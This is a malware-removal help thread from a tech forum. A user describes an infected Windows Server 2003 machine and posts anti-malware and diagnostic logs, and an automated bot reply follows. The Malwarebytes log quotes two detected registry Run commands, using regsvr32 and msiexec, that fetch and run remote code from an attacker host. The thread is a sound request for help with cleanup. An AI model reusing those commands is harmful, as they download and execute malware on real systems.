 

- Machine lost some network shares that where on C:\subfolders:

 

​- Seems like NetBIOS or SMB server (not client) is not working.

 

​- Unable to run windows update

 

​- Unable to query properties of processes on TCPVIEW. A hidden [System Process] was sending http connections but alternatively svchost and explorer.exe were sending the same connections out .

 

- Reports from ClamWin detected:

 

- Most recent Malwarebytes AntiRootkit log file :

 

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
Database version:
  main:    v2017.05.19.01
  rootkit: v2017.04.02.01
Windows Server 2003 Service Pack 2 x64 NTFS
Internet Explorer 8.0.6001.18702
Administrator :: IVR02 [administrator]
5/18/2017 8:50:07 PM
mbar-log-2017-05-18 (20-50-07).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 302666
Time elapsed: 23 minute(s), 15 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 0
(No malicious items detected)
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 2
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start (Trojan.Agent.Generic) -> Data: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll -> Delete on reboot. [bc419980773263d3f3e38dbcd729c937]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start1 (Trojan.Agent.Generic) -> Data: msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q -> Delete on reboot. [ad509a7ff8b1f83e1fbdb3a1ff01837d]
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 0
(No malicious items detected)
Files Detected: 1
C:\WINDOWS\UpdateInstaller.exe (Trojan.Reconyc) -> Delete on reboot. [ea1320f907a2e0561a1d6c7288796799]
Physical Sectors Detected: 0
(No malicious items detected)
(end)

 

- Malwarebytes AntiRootkit first log file :

 

 

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
Database version:
  main:    v2014.11.18.05
  rootkit: v2014.11.12.01
Windows Server 2003 Service Pack 2 x64 NTFS
Internet Explorer 8.0.6001.18702
5/15/2017 2:23:15 PM
mbar-log-2017-05-15 (14-23-15).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 458498
Time elapsed: 39 minute(s), 31 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 1
C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME%\vndtf.cc3 (Trojan.ServiceHijacker) -> Delete on reboot. [ab92053895e7f343c6af1bf6c14410f0]
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 0
(No malicious items detected)
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 1
C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME% (Trojan.ServiceHijacker) -> Delete on reboot. [fd40c07d225a89ad2b5197617d858a76]
Files Detected: 4
C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME%\vndtf.cc3 (Trojan.ServiceHijacker) -> Delete on reboot. [ab92053895e7f343c6af1bf6c14410f0]
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\MP8TI1WV\888[1].exe (Malware.Gen) -> Delete on reboot. [f548c17ce597c472130cf174dd238080]
C:\Documents and Settings\Administrator.ART\Desktop\explorer.exe (Heuristics.Reserved.Word.Exploit) -> Delete on reboot. [1f1eca73c3b9a6907104cf7fdb2a52ae]
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\SBKBOT8L\svchost[1].exe (Heuristics.Reserved.Word.Exploit) -> Delete on reboot. [2d105fdeaad291a57807f45ae32204fc]
Physical Sectors Detected: 0
(No malicious items detected)
(end)

 

 

- HijackThis report:

 

 

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 3:55:38 PM, on 5/15/2017
Platform: Windows 2003 SP2 (WinNT 5.02.3790)
MSIE: Internet Explorer v8.00 (8.00.6001.23707)

Boot mode: Normal
Running processes:
C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe
C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe
C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\AgPkiMon.exe
C:\WINDOWS\SysWOW64\ctfmon.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = res://shdoclc.dll/softAdmin.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.chrome.com/
F2 - REG:system.ini: UserInit=userinit,
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'Default user')
O15 - ESC Trusted Zone: http://www.bing.com
O15 - ESC Trusted Zone: http://runonce.msn.com
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\SysWOW64\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\SysWOW64\browseui.dll
O23 - Service: CA ARCserve Discovery Service (CASDiscovery) - CA - C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe
O23 - Service: CA ARCserve Universal Agent (CASUniversalAgent) - CA - C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\UnivAgent.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - Unknown owner - C:\WINDOWS\System32\dmadmin.exe (file missing)
O23 - Service: Event Log (Eventlog) - Unknown owner - C:\WINDOWS\system32\services.exe (file missing)
O23 - Service: HTTP SSL (HTTPFilter) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: Intel® PROSet Monitoring Service - Unknown owner - C:\WINDOWS\system32\IProsetMonitor.exe (file missing)
O23 - Service: Distributed Transaction Coordinator (MSDTC) - Unknown owner - C:\WINDOWS\system32\msdtc.exe (file missing)
O23 - Service: Net Logon (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: NT LM Security Support Provider (NtLmSsp) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: CA Backup Agent for Open Files (OpenFileAgent) - CA - C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe
O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\WINDOWS\system32\services.exe (file missing)
O23 - Service: IPSEC Services (PolicyAgent) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Protected Storage (ProtectedStorage) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Remote Desktop Help Session Manager (RDSessMgr) - Unknown owner - C:\WINDOWS\system32\sessmgr.exe (file missing)
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Riverbed Technology, Inc. - C:\Program Files (x86)\WinPcap\rpcapd.exe
O23 - Service: Security Accounts Manager (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Volume Shadow Copy (VSS) - Unknown owner - C:\WINDOWS\System32\vssvc.exe (file missing)
O23 - Service: WMI Performance Adapter (WmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\wmiapsrv.exe (file missing)
--
End of file - 6755 bytes

 

 

aswMBR report:

 

 

aswMBR version 1.0.1.2252 Copyright© 2014 AVAST Software
Run date: 2017-05-15 20:39:23
-----------------------------
20:39:23.974    OS Version: Windows x64 5.2.3790 Service Pack 2
20:39:23.974    Number of processors: 4 586 0x1706
20:39:23.990    ComputerName: *** UserName: ***
20:39:24.959    Initialize success
20:39:25.006    VM: initialized successfully
20:39:25.021    VM: Intel CPU BiosDisabled
20:39:34.162    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3
20:39:34.162    Disk 0 Vendor: WDC_WD1500ADFD-00NLR5 21.07QR5 Size: 143089MB BusType: 3
20:39:34.240    Disk 0 MBR read successfully
20:39:34.240    Disk 0 MBR scan
20:39:34.240    Disk 0 Windows XP default MBR code
20:39:34.240    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS       143078 MB offset 63
20:39:34.287    Disk 0 scanning C:\WINDOWS\system32\drivers
20:39:37.474    Service scanning
20:39:48.349    Modules scanning
20:39:48.349    Disk 0 trace - called modules:
20:39:48.349    ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys atapi.sys pciide.sys PCIIDEX.SYS hal.dll
20:39:48.349    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffadf9bf3c060]
20:39:48.364    3 CLASSPNP.SYS[fffffadf8fc218c9] -> nt!IofCallDriver -> \Device\00000064[0xfffffadf9bf2ba00]
20:39:48.364    5 ACPI.sys[fffffadf8fd93e69] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-3[0xfffffadf9c9c6060]
20:39:48.364    Disk 0 statistics 41715/0/0 @ 6.49 MB/s
20:39:48.380    Scan finished successfully
20:40:13.973    Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Administrator.***\Desktop\MBR.dat"
20:40:13.973    The log file has been saved successfully to "C:\Documents and Settings\Administrator.***\Desktop\aswMBR.txt"
 

JRT removal tool : Tool didn't detect anything.

 

 

RKill:

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html
Program started at: 05/15/2017 07:58:18 PM in x64 mode.
Windows Version: Microsoft Windows Server 2003 Service Pack 2
Checking for Windows services to stop:
 * No malware services found to stop.
Checking for processes to terminate:
 * No malware processes found to kill.
Checking Registry for malware related settings:
 * No issues found in the Registry.
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
Performing miscellaneous checks:
 * Windows Firewall Disabled
   [HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
   "EnableFirewall" = dword:00000000
 * Windows Firewall Disabled
   [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
   "EnableFirewall" = dword:00000000
Checking Windows Service Integrity:
 * No issues found.
Searching for Missing Digital Signatures:
 * No issues found.
Checking HOSTS File:
 * HOSTS file entries found:
  127.0.0.1       localhost
Program finished at: 05/15/2017 08:03:14 PM
Execution time: 0 hours(s), 4 minute(s), and 56 seconds(s)

 

OTL Extras:

 

 

OTL Extras logfile created on: 5/15/2017 5:01:52 PM - Run 1
OTL by OldTimer - Version 3.2.69.0    
64bit-Windows Server 2003 Standard Edition Service Pack 2 (Version = 5.2.3790) - Type = NTServer
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.99 Gb Total Physical Memory | 1.76 Gb Available Physical Memory | 43.96% Memory free
5.73 Gb Paging File | 3.47 Gb Available in Paging File | 60.48% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]
 
 
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.inf [@ = inffile] -- %SystemRoot%\System32\NOTEPAD.EXE %1
.ini [@ = inifile] -- %SystemRoot%\System32\NOTEPAD.EXE %1
.js [@ = JSFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.jse [@ = JSEFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.txt [@ = txtfile] -- %SystemRoot%\system32\NOTEPAD.EXE %1
.vbe [@ = VBEFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.vbs [@ = VBSFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.wsf [@ = WSFFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
.wsh [@ = WSHFile] -- %SystemRoot%\System32\WScript.exe "%1" %*
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1
batfile [open] -- "%1" %*
batfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1
cmdfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1
cmdfile [open] -- "%1" %*
cmdfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
htmlfile [edit] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1
inffile [open] -- %SystemRoot%\System32\NOTEPAD.EXE %1
inffile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1
inifile [open] -- %SystemRoot%\System32\NOTEPAD.EXE %1
inifile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1
InternetShortcut [print] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\mshtml.dll",PrintHTML "%1"
jsfile [edit] -- %SystemRoot%\System32\Notepad.exe %1
jsfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
jsfile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
jsefile [edit] -- %SystemRoot%\System32\Notepad.exe %1
jsefile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
jsefile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
piffile [open] -- "%1" %*
regfile [edit] -- %SystemRoot%\system32\NOTEPAD.EXE %1
regfile [merge] -- Reg Error: Key error.
regfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1
txtfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1
txtfile [printto] -- %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4"
vbefile [edit] -- %SystemRoot%\System32\Notepad.exe %1
vbefile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
vbefile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
vbsfile [edit] -- %SystemRoot%\System32\Notepad.exe %1
vbsfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
vbsfile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
wsffile [edit] -- %SystemRoot%\System32\Notepad.exe %1
wsffile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
wsffile [print] -- %SystemRoot%\System32\Notepad.exe /p %1
wshfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %*
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
htmlfile [edit] -- Reg Error: Key error.
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
========== Firewall Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
"EnableFirewall" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"9089:TCP" = 9089:TCP:*:Enabled:VMware vCenter Converter Standalone - Agent
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"C:\WINDOWS\SysWOW64\rundll32.exe" = C:\WINDOWS\SysWOW64\rundll32.exe:*:Enabled:rundll32 -- (Microsoft Corporation)
"C:\WINDOWS\SysWOW64\rundll32.exe" = C:\WINDOWS\SysWOW64\rundll32.exe:*:Enabled:rundll32 -- (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{3C28BFD4-90C7-3138-87EF-418DC16E9598}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.51106
"{54F2237F-018C-483B-8884-9FC0D88840C3}" = VC_CRT_x64
"{5AF4E09F-5C9B-3AAF-B731-544D3DC821DD}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.51106
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{CAABD00D-1FA6-48CD-AD28-75BABE0522AE}" = CA ARCserve Backup Client Agent for Windows
"{CAABD4AD-A551-4AA4-82ED-87247EB7DD72}" = CA ARCserve Universal Agent
"{CAABDD41-1935-4C04-AE4B-803EF455E1A3}" = CA ARCserve Backup Agent for Open Files for Windows
"{FCF3ECF7-7AE0-4E26-B387-09A3A80B79CC}" = Intel® Network Connections 18.3.62.0
"ie8" = Windows Internet Explorer 8
"WinRAR archiver" = WinRAR 5.21 (64-bit)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{2BCC4907-4205-4338-BDA5-94F183144C35}" = VMware vCenter Converter Standalone
"{6C772996-BFF3-3C8C-860B-B3D48FF05D65}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.51106
"{6e8f74e0-43bd-4dce-8477-6ff6828acc07}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{8e70e4e1-06d7-470b-9f74-a51bef21088e}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{CAABD0BC-0C3F-4E38-AF09-2300389691FF}" = CA ARCserve Backup Setup Support Files
"{CAABDC77-9350-47CF-ADC1-682C60F70E2E}" = CA ARCserve Discovery Service
"{E824E81C-80A4-3DFF-B5F9-4842A9FF5F7F}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.51106
"CA ARCserve Backup" = CA ARCserve Backup
"Notepad++" = Notepad++
"WinPcapInst" = WinPcap 4.1.3
"Wireshark" = Wireshark 1.12.2 (64-bit)
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 5/15/2017 6:48:15 PM | Computer Name = *** | Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: This network connection does not exist. 
 
Error - 5/15/2017 6:48:45 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
Error - 5/15/2017 6:49:00 PM | Computer Name = ***| Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: This operation returned because the timeout period expired. 
 
Error - 5/15/2017 7:04:25 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
Error - 5/15/2017 7:04:40 PM | Computer Name = ***| Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: This operation returned because the timeout period expired. 
 
Error - 5/15/2017 7:05:25 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
Error - 5/15/2017 7:05:25 PM | Computer Name = IVR02 | Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: The specified server cannot perform the requested operation. 
 
Error - 5/15/2017 7:48:18 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
Error - 5/15/2017 7:48:33 PM | Computer Name = ***| Source = crypt32 | ID = 131080
Description = Failed auto update retrieval of third-party root list sequence number
 from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
 with error: This operation returned because the timeout period expired. 
 
Error - 5/15/2017 7:49:03 PM | Computer Name = ***| Source = crypt32 | ID = 131083
Description = Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>
 with error: A required certificate is not within its validity period when verifying
 against the current system clock or the timestamp in the signed file. 
 
[ System Events ]
Error - 5/15/2017 1:46:58 PM | Computer Name = ***| Source = Application Popup | ID = 1060
Description = \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys has been blocked
 from loading due to incompatibility with this system. Please contact your software
vendor
 for a compatible version of the driver.
 
Error - 5/15/2017 1:48:17 PM | Computer Name = IVR02 | Source = Service Control Manager | ID = 7023
Description = The Windows Management Instrumentation Driver Service service terminated
 with the following error:   %%127
 
Error - 5/15/2017 5:22:20 PM | Computer Name = ***| Source = Application Popup | ID = 1060
Description = \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys has been blocked
 from loading due to incompatibility with this system. Please contact your software
vendor
 for a compatible version of the driver.
 
Error - 5/15/2017 5:22:20 PM | Computer Name = ***| Source = Service Control Manager | ID = 7000
Description = The mbamchameleon service failed to start due to the following error:
   %%1275
 
Error - 5/15/2017 6:06:06 PM | Computer Name = ***| Source = Application Popup | ID = 1060
Description = \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys has been blocked
 from loading due to incompatibility with this system. Please contact your software
vendor
 for a compatible version of the driver.
 
Error - 5/15/2017 6:07:27 PM | Computer Name = ***| Source = Service Control Manager | ID = 7023
Description = The Windows Management Instrumentation Driver Service service terminated
 with the following error:   %%127
 
Error - 5/15/2017 6:07:27 PM | Computer Name = ***| Source = Service Control Manager | ID = 7023
Description = The nimnkjwe service terminated with the following error:   %%126
 
Error - 5/15/2017 6:07:27 PM | Computer Name = ***| Source = Service Control Manager | ID = 7026
Description = The following boot-start or system-start driver(s) failed to load:
   crcdisk
 
Error - 5/15/2017 6:11:55 PM | Computer Name = ***| Source = Application Popup | ID = 1060
Description = \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys has been blocked
 from loading due to incompatibility with this system. Please contact your software
vendor
 for a compatible version of the driver.
 
Error - 5/15/2017 6:11:55 PM | Computer Name = ***| Source = Service Control Manager | ID = 7000
Description = The mbamchameleon service failed to start due to the following error:
   %%1275
 
 
< End of report >

Edited by jtcote, 19 May 2017 - 10:30 AM.


#4 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,578 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:36 AM

Posted 23 May 2017 - 06:40 PM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

step1.gif In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> https://www.bleepingcomputer.com/logreply/647071 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

step2.gifIf you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new FRST log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
